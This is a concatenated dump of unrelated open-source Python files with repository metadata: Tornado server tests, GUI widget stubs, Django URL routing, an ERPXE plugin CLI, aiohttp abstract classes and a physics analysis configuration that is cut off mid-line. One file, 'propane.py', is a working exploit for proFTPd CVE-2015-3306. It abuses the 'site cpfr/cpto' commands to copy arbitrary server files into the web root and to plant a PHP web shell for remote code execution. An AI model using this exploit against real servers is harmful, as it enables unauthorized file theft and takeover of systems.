# 431 is "Request Header Fields Too Large", defined in RFC # 6585. However, many implementations just close the # connection in this case, resulting in a 599. self.assertIn(response.code, (431, 599)) @skipOnTravis class IdleTimeoutTest(AsyncHTTPTestCase): def get_app(self): return Application([('/', HelloWorldRequestHandler)]) def get_httpserver_options(self): return dict(idle_connection_timeout=0.1) def setUp(self): super(IdleTimeoutTest, self).setUp() self.streams = [] def tearDown(self): super(IdleTimeoutTest, self).tearDown() for stream in self.streams: stream.close() def connect(self): stream = IOStream(socket.socket()) stream.connect(('127.0.0.1', self.get_http_port()), self.stop) self.wait() self.streams.append(stream) return stream def test_unused_connection(self): stream = self.connect() stream.set_close_callback(self.stop) self.wait() def test_idle_after_use(self): stream = self.connect() stream.set_close_callback(lambda: self.stop("closed")) # Use the connection twice to make sure keep-alives are working for i in range(2): stream.write(b"GET / HTTP/1.1\r\n\r\n") stream.read_until(b"\r\n\r\n", self.stop) self.wait() stream.read_bytes(11, self.stop) data = self.wait() self.assertEqual(data, b"Hello world") # Now let the timeout trigger and close the connection. data = self.wait() self.assertEqual(data, "closed") class BodyLimitsTest(AsyncHTTPTestCase): def get_app(self): class BufferedHandler(RequestHandler): def put(self): self.write(str(len(self.request.body))) @stream_request_body class StreamingHandler(RequestHandler): def initialize(self): self.bytes_read = 0 def prepare(self): if 'expected_size' in self.request.arguments: self.request.connection.set_max_body_size( int(self.get_argument('expected_size'))) if 'body_timeout' in self.request.arguments: self.request.connection.set_body_timeout( float(self.get_argument('body_timeout'))) def data_received(self, data): self.bytes_read += len(data) def put(self): self.write(str(self.bytes_read)) return Application([('/buffered', BufferedHandler), ('/streaming', StreamingHandler)]) def get_httpserver_options(self): return dict(body_timeout=3600, max_body_size=4096) def get_http_client(self): # body_producer doesn't work on curl_httpclient, so override the # configured AsyncHTTPClient implementation. return SimpleAsyncHTTPClient(io_loop=self.io_loop) def test_small_body(self): response = self.fetch('/buffered', method='PUT', body=b'a' * 4096) self.assertEqual(response.body, b'4096') response = self.fetch('/streaming', method='PUT', body=b'a' * 4096) self.assertEqual(response.body, b'4096') def test_large_body_buffered(self): with ExpectLog(gen_log, '.*Content-Length too long'): response = self.fetch('/buffered', method='PUT', body=b'a' * 10240) self.assertEqual(response.code, 599) def test_large_body_buffered_chunked(self): with ExpectLog(gen_log, '.*chunked body too large'): response = self.fetch('/buffered', method='PUT', body_producer=lambda write: write(b'a' * 10240)) self.assertEqual(response.code, 599) def test_large_body_streaming(self): with ExpectLog(gen_log, '.*Content-Length too long'): response = self.fetch('/streaming', method='PUT', body=b'a' * 10240) self.assertEqual(response.code, 599) def test_large_body_streaming_chunked(self): with ExpectLog(gen_log, '.*chunked body too large'): response = self.fetch('/streaming', method='PUT', body_producer=lambda write: write(b'a' * 10240)) self.assertEqual(response.code, 599) def test_large_body_streaming_override(self): response = self.fetch('/streaming?expected_size=10240', method='PUT', body=b'a' * 10240) self.assertEqual(response.body, b'10240') def test_large_body_streaming_chunked_override(self): response = self.fetch('/streaming?expected_size=10240', method='PUT', body_producer=lambda write: write(b'a' * 10240)) self.assertEqual(response.body, b'10240') @gen_test def test_timeout(self): stream = IOStream(socket.socket()) try: yield stream.connect(('127.0.0.1', self.get_http_port())) # Use a raw stream because AsyncHTTPClient won't let us read a # response without finishing a body. stream.write(b'PUT /streaming?body_timeout=0.1 HTTP/1.0\r\n' b'Content-Length: 42\r\n\r\n') with ExpectLog(gen_log, 'Timeout reading body'): response = yield stream.read_until_close() self.assertEqual(response, b'') finally: stream.close() @gen_test def test_body_size_override_reset(self): # The max_body_size override is reset between requests. stream = IOStream(socket.socket()) try: yield stream.connect(('127.0.0.1', self.get_http_port())) # Use a raw stream so we can make sure it's all on one connection. stream.write(b'PUT /streaming?expected_size=10240 HTTP/1.1\r\n' b'Content-Length: 10240\r\n\r\n') stream.write(b'a' * 10240) headers, response = yield gen.Task(read_stream_body, stream) self.assertEqual(response, b'10240') # Without the ?expected_size parameter, we get the old default value stream.write(b'PUT /streaming HTTP/1.1\r\n' b'Content-Length: 10240\r\n\r\n') with ExpectLog(gen_log, '.*Content-Length too long'): data = yield stream.read_until_close() self.assertEqual(data, b'') finally: stream.close() class LegacyInterfaceTest(AsyncHTTPTestCase): def get_app(self): # The old request_callback interface does not implement the # delegate interface, and writes its response via request.write # instead of request.connection.write_headers. def handle_request(request): self.http1 = request.version.startswith("HTTP/1.") if not self.http1: # This test will be skipped if we're using HTTP/2, # so just close it out cleanly using the modern interface. request.connection.write_headers( ResponseStartLine('', 200, 'OK'), HTTPHeaders()) request.connection.finish() return message = b"Hello world" request.write(utf8("HTTP/1.1 200 OK\r\n" "Content-Length: %d\r\n\r\n" % len(message))) request.write(message) request.finish() return handle_request def test_legacy_interface(self): response = self.fetch('/') if not self.http1: self.skipTest("requires HTTP/1.x") self.assertEqual(response.body, b"Hello world")
mr-ping/tornado
tornado/test/httpserver_test.py
Python
apache-2.0
41,934
0.000501
import sys # widgets class Button: """ Represents button Keyword arguments: text -- button text | str onclick -- function invoked after pressing the button | function: Button -> void Attributes: wide -- makes the button wide """ def __new__(cls, text=None, onclick=None): return object.__new__(sys.modules['aui.widgets'].Button) def __init__(self, text, onclick=None): self.wide = self def destroy(self): """Destroys the button""" pass class Checkbox: """ Represents checkbox in UI Keyword arguments: text -- checkbox text | str selected -- whether the checkbox is selected on init | boolean onchange -- function invoked after toggling the checkbox | function: Checkbox -> void """ def __new__(cls, text=None, selected=False, onchange=None, *args): return object.__new__(sys.modules['aui.widgets'].Checkbox) def __init__(self, text, selected=False, onchange=None): pass def destroy(self): """Destroys the checkbox""" pass class Input: """ Represents input field in UI Keyword arguments: value -- default value | str (default: "") onenter -- function called after the return key is pressed | function: Input -> void Attributes: wide -- makes the input wide """ def __new__(cls, value="", onenter=None, *args): return object.__new__(sys.modules['aui.widgets'].Input) def __init__(self, value="", onenter=None): self.wide = self def destroy(self): """Destroys the input field""" pass class Label: """ Represents label in UI Keyword arguments: text -- label text | str """ def __new__(cls, text=None, *args): return object.__new__(sys.modules['aui.widgets'].Label) def __init__(self, text): pass def destroy(self): """Destroys the label""" pass class Text: """ Represents multiline input field in UI Keyword arguments: text -- widget text | str (default: "") """ def __new__(cls, text=None, *args): return object.__new__(sys.modules['aui.widgets'].Text) def __init__(self, text=""): pass def destroy(self): """Destroys the text field""" pass # containers class Vertical: """ Represents vertical container in UI Arguments: *children -- children elements of the container """ def __new__(cls, *args): return object.__new__(sys.modules['aui.widgets'].Vertical) def append(self, child): """ Appends widget to the vertical container Keyword arguments: child -- the widget to be placed into the container """ pass def create(self, parent, align=None): """ Creates vertical container and assigns it to its parent Keyword arguments: parent -- parent of the element to be put into align -- alignment of the element in container tk.constants.(TOP/RIGHT/BOTTOM/LEFT) """ pass def destroy(self): """Destroys the vertical container""" pass class Horizontal: """ Represents horizontal container in UI Arguments: *children -- children elements of the container """ def __new__(cls, *args): return object.__new__(sys.modules['aui.widgets'].Horizontal) def append(self, child): """ Appends widget to the horizontal container Keyword arguments: child -- the widget to be placed into the container """ pass def create(self, parent, align=None): """ Creates horizontal container and assigns it to its parent Keyword arguments: parent -- parent of the element to be put into align -- alignment of the element in container tk.constants.(TOP/RIGHT/BOTTOM/LEFT) """ pass def destroy(self): """Destroys the horizontal container""" pass
klausweiss/python-aui
aui/widgets.py
Python
bsd-2-clause
4,207
0.000475
#! /usr/bin/env python # -*- coding: utf-8 -*- # Copyright (C) 2011 ~ 2012 Deepin, Inc. # 2011 ~ 2012 Wang Yong # # Author: Wang Yong <lazycat.manatee@gmail.com> # Maintainer: Wang Yong <lazycat.manatee@gmail.com> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import gtk import gobject from cache_pixbuf import CachePixbuf from draw import draw_pixbuf class CycleStrip(gtk.HBox): ''' CycleStrip class. This widget use for cycle drawing background, but use CachePixbuf to accelerate render. @undocumented: expose_cycle_strip ''' def __init__(self, background_dpixbuf): ''' Initialize CycleStrip class. @param background_dpixbuf: DynamicPixbuf background. ''' gtk.HBox.__init__(self) self.background_dpixbuf = background_dpixbuf self.cache_pixbuf = CachePixbuf() self.set_size_request(-1, self.background_dpixbuf.get_pixbuf().get_height()) self.connect("expose-event", self.expose_cycle_strip) def expose_cycle_strip(self, widget, event): # Init. cr = widget.window.cairo_create() rect = widget.allocation background_pixbuf = self.background_dpixbuf.get_pixbuf() self.cache_pixbuf.scale( background_pixbuf, rect.width, rect.height) draw_pixbuf( cr, self.cache_pixbuf.get_cache(), rect.x, rect.y) return False gobject.type_register(CycleStrip)
linuxdeepin/deepin-ui
dtk/ui/cycle_strip.py
Python
gpl-3.0
2,087
0.001917
from django.conf.urls.defaults import * from .views import * urlpatterns = patterns('', url(r'^signup/$', view=SignupLoginView.as_view( featured_form_mixin_class=SignupMultipleFormMixin), name='accounts_signup' ), url(r'^login/$', view=SignupLoginView.as_view( featured_form_mixin_class=LoginMultipleFormMixin), name='accounts_login' ), url(r'^signup-login/$', view=SignupLoginView.as_view(), name='accounts_signup_login' ), url(r'^iframes/signup/$', view=SignupLoginIframeView.as_view( featured_form_mixin_class=SignupIframeMultipleFormMixin), name='accounts_signup_iframe' ), url(r'^iframes/login/$', view=SignupLoginIframeView.as_view( featured_form_mixin_class=LoginIframeMultipleFormMixin), name='accounts_login_iframe' ), url(r'^iframes/signup-login/$', view=SignupLoginIframeView.as_view(), name='accounts_signup_login_iframe' ), url(r'^iframes/signup-login/success/$', view=SignupLoginSuccessIframeView.as_view(), name='accounts_signup_login_success_iframe' ), url(r'^logout/$', view=LogoutView.as_view(), name='accounts_logout' ), )
mfogel/django-signup-login
signup_login/urls.py
Python
bsd-3-clause
1,287
0.006993
# import the ERPXE core API import core # Global variables TFTPBOOT_DIR = "/tftpboot" PLUGINS_DIR = TFTPBOOT_DIR + "/er/plugins" # try to Load configuration from file system or use defaults def load_configuration(): # try to fetch configuration from file try: config = core.get_configuration() except: print "error loading " load_configuration() # parse CLI arguments def cli(arguments): verbose = arguments['--verbose'] if arguments['list']: show_plugins() elif arguments['status']: print_status() elif arguments['render']: generate_menu() elif arguments['enable']: plugin = arguments['<plugin>'] enable(plugin) elif arguments['disable']: plugin = arguments['<plugin>'] disable(plugin) def print_status(): import os.path # print some pre-status header print "ERPXE v2.0" # test folders print "TFTPBOOT path: " + TFTPBOOT_DIR if os.path.isdir(TFTPBOOT_DIR): print "directory found." print "Plugins path: " + PLUGINS_DIR if os.path.isdir(PLUGINS_DIR): print "directory found." def show_plugins(): plugins = core.get_plugins_list(PLUGINS_DIR) if plugins: print "Installed plugins:" for plugin in plugins: if plugin['deactivated']: print plugin['name'] + " (disabled) " else: print plugin['name'] # Generate Menu files inside the TFTPBOOT folder. def generate_menu(): try: core.get_configuration() print("ERPXE menu rendered succesfully") except Exception, e: print str(e) print "missing configuration file. use 'erpxe create-configuration-file' command to create one from template" return core.generate_menu(TFTPBOOT_DIR, PLUGINS_DIR) def similar(PLUGIN): from difflib import SequenceMatcher plugins = core.get_plugins_list(PLUGINS_DIR) bestName = '' bestScore = 0 for plugin in plugins: score = SequenceMatcher(None, PLUGIN.lower(), plugin['name'].lower()).ratio() if score > bestScore and score > .5: bestScore = score bestName = plugin['name'] if bestScore > 0: print "maybe you meant: " + bestName + " ?" # Enable plugin def enable(PLUGIN): if not core.is_plugin_exist(PLUGINS_DIR, PLUGIN): print "plugin not exist" return similar (PLUGIN) core.enable_plugin(TFTPBOOT_DIR, PLUGINS_DIR, PLUGIN) # Disable plugin def disable(PLUGIN): if not core.is_plugin_exist(PLUGINS_DIR, PLUGIN): print "plugin not exist" return similar (PLUGIN) core.disable_plugin(TFTPBOOT_DIR, PLUGINS_DIR, PLUGIN) print "Plugin disabled"
ERPXE/erpxe
erpxe/cli.py
Python
gpl-3.0
2,519
0.030171
"""URLs to run the tests.""" try: from django.urls import include except ImportError: from django.conf.urls import include from django.conf.urls import url from django.contrib import admin admin.autodiscover() urlpatterns = ( url(r'^admin/', admin.site.urls), url(r'^status', include('server_status.urls')), )
mitodl/django-server-status
server_status/tests/urls.py
Python
agpl-3.0
328
0
"""Represent a mood on the gateway.""" from .const import ROOT_MOODS from .resource import ApiResource class Mood(ApiResource): def __init__(self, raw, parent): super().__init__(raw) self._parent = parent @property def path(self): return [ROOT_MOODS, self._parent, self.id] def __repr__(self): return '<Mood {}>'.format(self.name)
r41d/pytradfri
pytradfri/mood.py
Python
mit
383
0
import asyncio import sys from abc import ABC, abstractmethod from collections.abc import Iterable, Sized PY_35 = sys.version_info >= (3, 5) class AbstractRouter(ABC): def __init__(self): self._frozen = False def post_init(self, app): """Post init stage. Not an abstract method for sake of backward compatibility, but if the router wants to be aware of the application it can override this. """ @property def frozen(self): return self._frozen def freeze(self): """Freeze router.""" self._frozen = True @asyncio.coroutine # pragma: no branch @abstractmethod def resolve(self, request): """Return MATCH_INFO for given request""" class AbstractMatchInfo(ABC): @asyncio.coroutine # pragma: no branch @abstractmethod def handler(self, request): """Execute matched request handler""" @asyncio.coroutine # pragma: no branch @abstractmethod def expect_handler(self, request): """Expect handler for 100-continue processing""" @property # pragma: no branch @abstractmethod def http_exception(self): """HTTPException instance raised on router's resolving, or None""" @abstractmethod # pragma: no branch def get_info(self): """Return a dict with additional info useful for introspection""" @property # pragma: no branch @abstractmethod def apps(self): """Stack of nested applications. Top level application is left-most element. """ @abstractmethod def add_app(self, app): """Add application to the nested apps stack.""" @abstractmethod def freeze(self): """Freeze the match info. The method is called after route resolution. After the call .add_app() is forbidden. """ class AbstractView(ABC): def __init__(self, request): self._request = request @property def request(self): return self._request @asyncio.coroutine # pragma: no branch @abstractmethod def __iter__(self): while False: # pragma: no cover yield None if PY_35: # pragma: no branch @abstractmethod def __await__(self): return # pragma: no cover class AbstractResolver(ABC): @asyncio.coroutine # pragma: no branch @abstractmethod def resolve(self, hostname): """Return IP address for given hostname""" @asyncio.coroutine # pragma: no branch @abstractmethod def close(self): """Release resolver""" class AbstractCookieJar(Sized, Iterable): def __init__(self, *, loop=None): self._loop = loop or asyncio.get_event_loop() @abstractmethod def clear(self): """Clear all cookies.""" @abstractmethod def update_cookies(self, cookies, response_url=None): """Update cookies.""" @abstractmethod def filter_cookies(self, request_url): """Return the jar's cookies filtered by their attributes.""" class AbstractPayloadWriter(ABC): @abstractmethod def write(self, chunk): """Write chunk into stream""" @asyncio.coroutine @abstractmethod def write_eof(self, chunk=b''): """Write last chunk""" @asyncio.coroutine @abstractmethod def drain(self): """Flush the write buffer."""
juliatem/aiohttp
aiohttp/abc.py
Python
apache-2.0
3,396
0
from port_range import PortRange pr = PortRange('1027/15') print(pr.bounds) pr = PortRange('4242-42') print(pr)
VRaviTheja/SDN-policy
testing/testing_portrange.py
Python
apache-2.0
112
0
#!/usr/bin/env python import sys import optparse import socket import random class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' if sys.platform == 'win32': HEADER = '' OKBLUE = '' OKGREEN = '' WARNING = '' FAIL = '' ENDC = '' BOLD = '' UNDERLINE = '' def caution( msg ): print bcolors.BOLD + bcolors.WARNING + "[" + bcolors.ENDC + "!" + bcolors.WARNING + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC def good( msg ): print bcolors.BOLD + bcolors.OKGREEN + "[" + bcolors.ENDC + "+" + bcolors.OKGREEN + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC def status( msg ): print bcolors.BOLD + bcolors.OKBLUE + "[" + bcolors.ENDC + "*" + bcolors.OKBLUE + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC def error( msg ): print bcolors.BOLD + bcolors.FAIL + "[" + bcolors.ENDC + "-" + bcolors.FAIL + "] " + bcolors.ENDC + str( msg ) + bcolors.ENDC def banner(): title = "proFTPd Arbitrary File Read Write w/ Possible Code Execution (CVE-2015-3306)" author = "Author: nootropics (root@ropcha.in)" ch=' ' length=80 spaced_title = ' %s ' % title spaced_author = ' %s ' % author print "\n" + bcolors.WARNING + spaced_title.center(length, ch) print spaced_author.center(length, ch) + "\n\n" + bcolors.ENDC def clear(): if os.name == 'nt' or sys.platform.startswith('win'): os.system('cls') else: os.system('clear') def main(): parser = optparse.OptionParser(banner(), version="%prog") parser.add_option("-t", "--target", dest="target", default="localhost", type="string", help="Target IP") parser.add_option("-p", "--port", dest="port", default=21, type="int", help="Target Port") parser.add_option("-f", "--file", dest="file", default="/etc/passwd", type="string", help="File to grab") parser.add_option("-m", "--mode", dest="chosenmode", default="1", type="string", help="Option to use 1: Test, 2: Grab File, 3: Code Exec") parser.add_option("-w", "--webdir", dest="webdir", default="/var/www/", type="string", help="Directory where the webserver gets files from (/var/www/)") (options, args) = parser.parse_args() try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(( options.target, options.port )) except Exception: quit(error("Cannot connect to %s:%s" % (options.target, options.port))) status("Connected to %s:%s" % (options.target, options.port)) if options.chosenmode == "1": s.send("site cpfr /etc/passwd\n") if "350" in s.recv(1024): good("Target is vulnerable!") else: error("Target doesn't appear to be vulnerable!") if options.chosenmode == "2": resultpath = options.webdir + ''.join(random.choice('0123456789ABCDEF') for i in range(16)) s.send("site cpfr %s" % options.file) if "350" in s.recv(1024): good("File exists! Copying now") else: error("File cannot be found or accessed") s.send("site cpto %s" % resultpath) if "250" in s.recv(1024): good("Copy sucessful! Check http://%s/%s for your file!" % (options.target, resultpath)) else: error("Access denied!") if options.chosenmode == "3": shellkey = ''.join(random.choice('0123456789ABCDEF') for i in range(16)) + ".php" s.send("site cpfr /etc/passwd") s.recv(1024) s.send("site cpto <?php @$_GET['x']($_GET['a']); ?>") s.recv(1024) s.send("site cpfr /proc/self/fd/3") s.recv(1024) s.send("site cpto %s%s" % (options.webdir, shellkey)) s.recv(1024) status("Browse to http://%s/%s to activate your payload!" % (options.target, shellkey)) if __name__ == "__main__": try: main() except KeyboardInterrupt: sys.exit(error("Closing!"))
nootropics/propane
propane.py
Python
mit
3,698
0.027853
# -*- coding: utf-8 -*- # # # TheVirtualBrain-Framework Package. This package holds all Data Management, and # Web-UI helpful to run brain-simulations. To use it, you also need do download # TheVirtualBrain-Scientific Package (for simulators). See content of the # documentation-folder for more details. See also http://www.thevirtualbrain.org # # (c) 2012-2013, Baycrest Centre for Geriatric Care ("Baycrest") # # This program is free software; you can redistribute it and/or modify it under # the terms of the GNU General Public License version 2 as published by the Free # Software Foundation. This program is distributed in the hope that it will be # useful, but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public # License for more details. You should have received a copy of the GNU General # Public License along with this program; if not, you can download it here # http://www.gnu.org/licenses/old-licenses/gpl-2.0 # # # CITATION: # When using The Virtual Brain for scientific publications, please cite it as follows: # # Paula Sanz Leon, Stuart A. Knock, M. Marmaduke Woodman, Lia Domide, # Jochen Mersmann, Anthony R. McIntosh, Viktor Jirsa (2013) # The Virtual Brain: a simulator of primate brain network dynamics. # Frontiers in Neuroinformatics (7:10. doi: 10.3389/fninf.2013.00010) # # """ .. moduleauthor:: Bogdan Neacsa <bogdan.neacsa@codemart.ro> """ from tvb.basic.logger.builder import get_logger from tvb.core.entities.storage import dao from tvb.core.services.event_handlers import handle_event LOGGER = get_logger(__name__) PAGE_SIZE = 20 EVENT_FILE_IDENTIFIER = "CodeVersionsManager.update.4750" def update(): """ Update TVB code to SVN revision version 4770. This update was done for release 1.0.5 """ projects_count = dao.get_all_projects(is_count=True) for page_start in range(0, projects_count, PAGE_SIZE): projects_page = dao.get_all_projects(page_start=page_start, page_end=min(page_start + PAGE_SIZE, projects_count)) for project in projects_page: try: handle_event(EVENT_FILE_IDENTIFIER, dao.get_system_user(), project) except Exception, excep: LOGGER.exception(excep)
stuart-knock/tvb-framework
tvb/core/code_versions/code_update_scripts/4750_update_code.py
Python
gpl-2.0
2,378
0.006728
from Gaudi.Configuration import * from Configurables import DaVinci #from Configurables import AlgTool from Configurables import GaudiSequencer MySequencer = GaudiSequencer('Sequence') #For 2012 MC DaVinci.DDDBtag='dddb-20130929-1' DaVinci.CondDBtag='sim-20130522-1-vc-md100' #for 2011 MC #DaVinci.DDDBtag='dddb-20130929' #DaVinci.CondDBtag='sim-20130522-vc-mu100' simulation=True ################################################################# #Rerun with stripping21 applied if simulation: from Configurables import EventNodeKiller from StrippingConf.Configuration import StrippingConf, StrippingStream from StrippingSettings.Utils import strippingConfiguration from StrippingArchive.Utils import buildStreams from StrippingArchive import strippingArchive event_node_killer=EventNodeKiller('StripKiller') event_node_killer.Nodes=['Event/AllStreams','/Event/Strip'] from Configurables import PhysConf PhysConf().CaloReProcessing=True stripping="stripping21" config=strippingConfiguration(stripping) archive=strippingArchive(stripping) streams=buildStreams(stripping=config,archive=archive) MyStream= StrippingStream("MyStream") MyLines= ["StrippingB2XEtaB2eta3piKstarLine"] for stream in streams: for line in stream.lines: if line.name() in MyLines: MyStream.appendLines( [ line ]) from Configurables import ProcStatusCheck filterBadEvents=ProcStatusCheck() sc=StrippingConf( Streams= [ MyStream ], MaxCandidates = 2000, AcceptBadEvents = False, BadEventSelection = filterBadEvents) DaVinci().appendToMainSequence([event_node_killer,sc.sequence()]) ##################Creating NTuples##################################### from Configurables import DecayTreeTuple from Configurables import TupleToolL0Calo from DecayTreeTuple.Configuration import * line = 'B2XEtaB2eta3piKstarLine' tuple=DecayTreeTuple() tuple.Decay="[B0 -> ^(K*(892)0 -> ^K+ ^pi-) ^(eta -> ^pi- ^pi+ ^(pi0 -> ^gamma ^gamma))]CC" tuple.Branches={"B0":"[B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))]CC"} tuple.Inputs=['/Event/Phys/{0}/Particles'.format(line)] tuple.addTool(TupleToolL0Calo()) tuple.TupleToolL0Calo.TriggerClusterLocation="/Event/Trig/L0/Calo" tuple.TupleToolL0Calo.WhichCalo="HCAL" tuple.ToolList += [ "TupleToolGeometry" , "TupleToolDira" , "TupleToolAngles" # , "TupleToolL0Calo" , "TupleToolPid" , "TupleToolKinematic" , "TupleToolPropertime" , "TupleToolPrimaries" , "TupleToolEventInfo" , "TupleToolTrackInfo" , "TupleToolVtxIsoln" , "TupleToolPhotonInfo" , "TupleToolMCBackgroundInfo" , "TupleToolCaloHypo" , "TupleToolTrackIsolation" , "TupleToolPi0Info" ] tuple.addTool(TupleToolDecay,name="B0") from Configurables import TupleToolDecayTreeFitter #========================================REFIT WITH DAUGHTERS AND PV CONSTRAINED============================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/ConsAll') tuple.B0.ConsAll.Verbose=True tuple.B0.ConsAll.constrainToOriginVertex=True tuple.B0.ConsAll.daughtersToConstrain = ["K*(892)0","eta"] #==============================REFIT WITH ETA, PI0 AND PV CONTRAINED============================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpf') tuple.B0.PVFitpf.Verbose=True tuple.B0.PVFitpf.constrainToOriginVertex=True tuple.B0.PVFitpf.daughtersToConstrain = ["eta","pi0"] #==============================REFIT WITH ONLY ETA AND PV CONSTRAINED========================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFit') tuple.B0.PVFit.Verbose=True tuple.B0.PVFit.constrainToOriginVertex=True tuple.B0.PVFit.daughtersToConstrain = ["eta"] #==============================REFIT WITH ETA AND PV K for piCONTRAINED============================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitKforpi') tuple.B0.PVFitKforpi.Verbose=True tuple.B0.PVFitKforpi.constrainToOriginVertex=True tuple.B0.PVFitKforpi.daughtersToConstrain = ["eta"] tuple.B0.PVFitKforpi.Substitutions={ "B0 -> (K*(892)0 -> ^K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "pi+" , "B~0 -> (K*(892)~0 -> ^K- pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "pi-" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piminus ->K swap ============== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminusforK') tuple.B0.PVFitpiminusforK.Verbose=True tuple.B0.PVFitpiminusforK.constrainToOriginVertex=True tuple.B0.PVFitpiminusforK.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiminusforK.Substitutions={ "B0 -> (K*(892)0 -> K+ ^pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "K-" , "B~0 -> (K*(892)~0 -> K- ^pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "K+" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piminus0 -> Kminus swap ============= tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminus0forK') tuple.B0.PVFitpiminus0forK.Verbose=True tuple.B0.PVFitpiminus0forK.constrainToOriginVertex=True tuple.B0.PVFitpiminus0forK.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiminus0forK.Substitutions={ "B0 -> (K*(892)0 -> K+ pi-) (eta -> ^pi- pi+ (pi0 -> gamma gamma))" : "K-" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> ^pi+ pi- (pi0 -> gamma gamma))" : "K+" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============ tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiplusforK') tuple.B0.PVFitpiplusforK.Verbose=True tuple.B0.PVFitpiplusforK.constrainToOriginVertex=True tuple.B0.PVFitpiplusforK.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiplusforK.Substitutions={ "B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- ^pi+ (pi0 -> gamma gamma))" : "K+" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ ^pi- (pi0 -> gamma gamma))" : "K-" , } #proton swaps #==============================REFIT WITH ETA AND PV K for proton CONTRAINED============================== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitKforproton') tuple.B0.PVFitKforproton.Verbose=True tuple.B0.PVFitKforproton.constrainToOriginVertex=True tuple.B0.PVFitKforproton.daughtersToConstrain = ["eta"] tuple.B0.PVFitKforproton.Substitutions={ "B0 -> (K*(892)0 -> ^K+ pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "p+" , "B~0 -> (K*(892)~0 -> ^K- pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "p~-" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piminus ->K swap ============== tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminusforproton') tuple.B0.PVFitpiminusforproton.Verbose=True tuple.B0.PVFitpiminusforproton.constrainToOriginVertex=True tuple.B0.PVFitpiminusforproton.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiminusforproton.Substitutions={ "B0 -> (K*(892)0 -> K+ ^pi-) (eta -> pi- pi+ (pi0 -> gamma gamma))" : "p~-" , "B~0 -> (K*(892)~0 -> K- ^pi+) (eta -> pi+ pi- (pi0 -> gamma gamma))" : "p+" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piminus0 -> Kminus swap ============= tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiminus0forproton') tuple.B0.PVFitpiminus0forproton.Verbose=True tuple.B0.PVFitpiminus0forproton.constrainToOriginVertex=True tuple.B0.PVFitpiminus0forproton.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiminus0forproton.Substitutions={ "B0 -> (K*(892)0 -> K+ pi-) (eta -> ^pi- pi+ (pi0 -> gamma gamma))" : "p~-" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> ^pi+ pi- (pi0 -> gamma gamma))" : "p+" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============ tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitpiplusforproton') tuple.B0.PVFitpiplusforproton.Verbose=True tuple.B0.PVFitpiplusforproton.constrainToOriginVertex=True tuple.B0.PVFitpiplusforproton.daughtersToConstrain = ["eta"] tuple.B0.PVFitpiplusforproton.Substitutions={ "B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- ^pi+ (pi0 -> gamma gamma))" : "p+" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ ^pi- (pi0 -> gamma gamma))" : "p~-" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============ tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitgammaforpi0') tuple.B0.PVFitgammaforpi0.Verbose=True tuple.B0.PVFitgammaforpi0.constrainToOriginVertex=True tuple.B0.PVFitgammaforpi0.daughtersToConstrain = ["eta"] tuple.B0.PVFitgammaforpi0.Substitutions={ "B0 -> (K*(892)0 -> K+ pi-) (eta -> pi- pi+ (pi0 -> ^gamma gamma))" : "pi0" , "B~0 -> (K*(892)~0 -> K- pi+) (eta -> pi+ pi- (pi0 -> ^gamma gamma))" : "pi0" , } #==============================REFIT WITH ETA AND PV CONTRAINED - piplus -> Kminus swap ============ tuple.B0.addTupleTool('TupleToolDecayTreeFitter/PVFitgamma0forpi0') tuple.B0.PVFitgamma0forpi0.Verbose=True tuple.B0.PVFitgamma0forpi0.constrainToOriginVertex=True tuple.B0.PVFitgamma0forpi0.daughtersToConstrain = ["eta"] tuple.B0.PVFitgamma0forpi0.Substitutions={ "B0 -> 